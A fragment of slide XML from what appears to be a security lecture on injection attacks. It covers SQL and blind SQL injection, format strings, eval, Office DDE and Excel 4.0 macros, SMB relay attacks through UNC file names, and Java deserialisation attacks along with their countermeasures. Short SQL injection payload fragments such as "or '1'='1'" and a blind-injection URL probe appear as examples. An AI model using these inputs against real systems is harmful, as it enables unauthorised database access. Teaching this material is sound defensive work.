              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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or '1'='1'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0598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Blind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SQL injection attack with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http://a.com/xyz?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sid</a:t>
            </a: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=s1232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AND SUBSTRING(user,1,1)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(Lack of) an error response reveals if username starts with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In a blind injection attack, we’re only interested in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leakage of information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  the database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, not in the effect of the query (e.g. to corrupt data in database) or the actual response (e.g. to leak data from database).   </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="33993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65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The class of injection attacks is bigger than you may realise: </a:t>
            </a:r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format string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%n, %s, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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serialised data representation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macros: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Word &amp; Excel containing Visual Basic (VBA)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or other weird Office ‘features’!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>PDFs containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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ActionScript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XML bombs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zip bombs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SMB relay attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with bizarre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>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080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More obscure injection attacks on Microsoft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Attackers can trigger RCE in Office without normal (Visual Basic) macros, using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DDE (Dynamic Data Exchange)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Also possible with emails in Outlook Rich Text Format (RTF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>             https://sensepost.com/blog/2017/macro-less-code-exec-in-msword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Excel 4.0 macros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Archaic legacy features that predate VBA  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>https://outflank.nl/blog/author/stan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/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Recall: 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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in data formats is bad</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" dirty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1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DDE warnings in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Microsoft initially claimed DDE was a feature, and not a bug, but later then did publish a security advisory in autumn 2017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24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50000" r="14563" b="19744"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2699792" y="3284984"/>
            <a:ext cx="4786966" cy="1376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8" r="4326" b="23327"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1319592"/>
            <a:ext cx="5544616" cy="1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1BB05-2363-E5C1-98B3-F2037A47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0" y="1012681"/>
            <a:ext cx="7952127" cy="5421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Windows supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600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notations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>  for file names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classic MS-DOS notation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C:\MyData\file.txt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file URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>                               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file:///C|/MyData/file.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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UNC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>(Uniform Naming Convention)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\\192.1.1.1\MyData\file.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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sz="1600" dirty="0"/>
              <a:t>which can be combined in fun ways, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>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file://///192.1.1.1/MyData/file.txt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Some notations cause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unexpected behaviour  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>by involving other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocols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UNC paths to remote servers are handled by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB protocol</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/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SMB sends password hash to remote server to authenticate,                                                        aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass the hash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This can be exploited by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SMB relay attacks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GB" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>CVE-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-0834 in Windows telnet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2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-4037 in Windows XP/Server/Vista                              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-5166 in Chromium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…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2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-3085 &amp;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-4271 in Adobe Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…                                                           …            …</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>ZDI-16-395 in Foxit PDF viewer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Recall: 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600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and (unexpected)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EXPRESSIITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data formats is bad</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="777611" lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1451" dirty="0"/>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2177" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1451" dirty="0"/>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t>[Example thanks to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0" err="1"/>
              <a:t>Björn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0" err="1"/>
              <a:t>Ruytenberg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1270" dirty="0"/>
              <a:t>, https://blog.bjornweb.nl]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96400895-9641-9132-873D-65C5D29D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77" dirty="0"/>
              <a:t>SMB relays: Injection attacks via Windows file names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Tijdelijke aanduiding voor dianummer 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD619065-3C22-14D3-61E5-F1F5B8A31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BF0F52F-21B9-46B2-AFDF-3BA1C6F63242}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"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Some programming languages have an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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/>
              <a:t>function  which treats an input string as code and executes it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> languages an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dirty="0"/>
              <a:t> construct:                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript, python, Haskell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1800" i="1" dirty="0"/>
              <a:t>Why do languages have this?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Useful for functionality: it allows very ‘dynamic’ code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0"/>
              <a:t>Why is this a terrible idea?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Prime target for injection attacks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Complicates static analysis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9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2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is evil and should never be used!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972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/>
              <a:t>(De)serialisation  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>marshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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turning a data structure or object into sequence of bytes or string</a:t>
            </a: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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unmarshalling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unpickling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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turning a sequence of bytes back into a data structure or object </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1451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633" i="1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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Typically uses?</a:t>
            </a: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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	storing objects on disk,  transferring objects over network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="492074">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1633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633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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4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97125416-AB23-9B4F-1F8D-C3729A6DC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0" y="2383920"/>
            <a:ext cx="1439710" cy="96220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675D93-44A4-3564-A7A5-A3799985BE39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2852973" y="2750975"/>
          <a:ext cx="3589632" cy="2280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424">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="144451998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498676224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198337913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57886681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766186555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121909549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57723690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4091211447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90762426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090460784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912072379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5962639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84636768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52205083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072043552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51228320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216510485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425119622"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="228096"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i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.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5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="7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m</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="700" dirty="0"/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881613616"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8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EC4BB3DD-D0D6-765E-9B35-1B1A09AA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02" y="2383920"/>
            <a:ext cx="1439710" cy="96220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1157609-711F-F560-3F42-1281803A5B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1959301" y="2645221"/>
            <a:ext cx="704301" cy="43960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GB" sz="1633">
              <a:latin typeface="Comic Sans MS" pitchFamily="6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A64E12-36A9-5126-BC96-13A19CED1CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6556321" y="2629043"/>
            <a:ext cx="704301" cy="439603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GB" sz="1633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 err="1"/>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2799" dirty="0"/>
              <a:t> attacks in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400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/>
              <a:t>Code to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t> objects from a file    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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2903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177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file contains serialised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33" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects,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33" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the deserialization code from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Student.java</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="635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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How would you attack this? </a:t>
            </a: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file contains other objects,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33" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for that class</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for any class on the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the object s is later discarded as garbage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> because the cast fails,  the garbage collector will invoke its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33" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> methods</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can execute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finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> method for any class on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marL="742873" lvl="1" indent="-285720" defTabSz="492074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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1361" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24971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 err="1"/>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2799" dirty="0"/>
              <a:t> attacks in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400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/>
              <a:t>Code to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0"/>
              <a:t> objects from a file    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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2903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177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b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1633" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can’t we only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects if they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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33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1633" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Subtle issue: only after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do we know that type of object   we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633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GB" sz="1633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Countermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look-Ahead Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to white-list which classes are allowed to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1633" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1633" dirty="0">
              <a:solidFill>
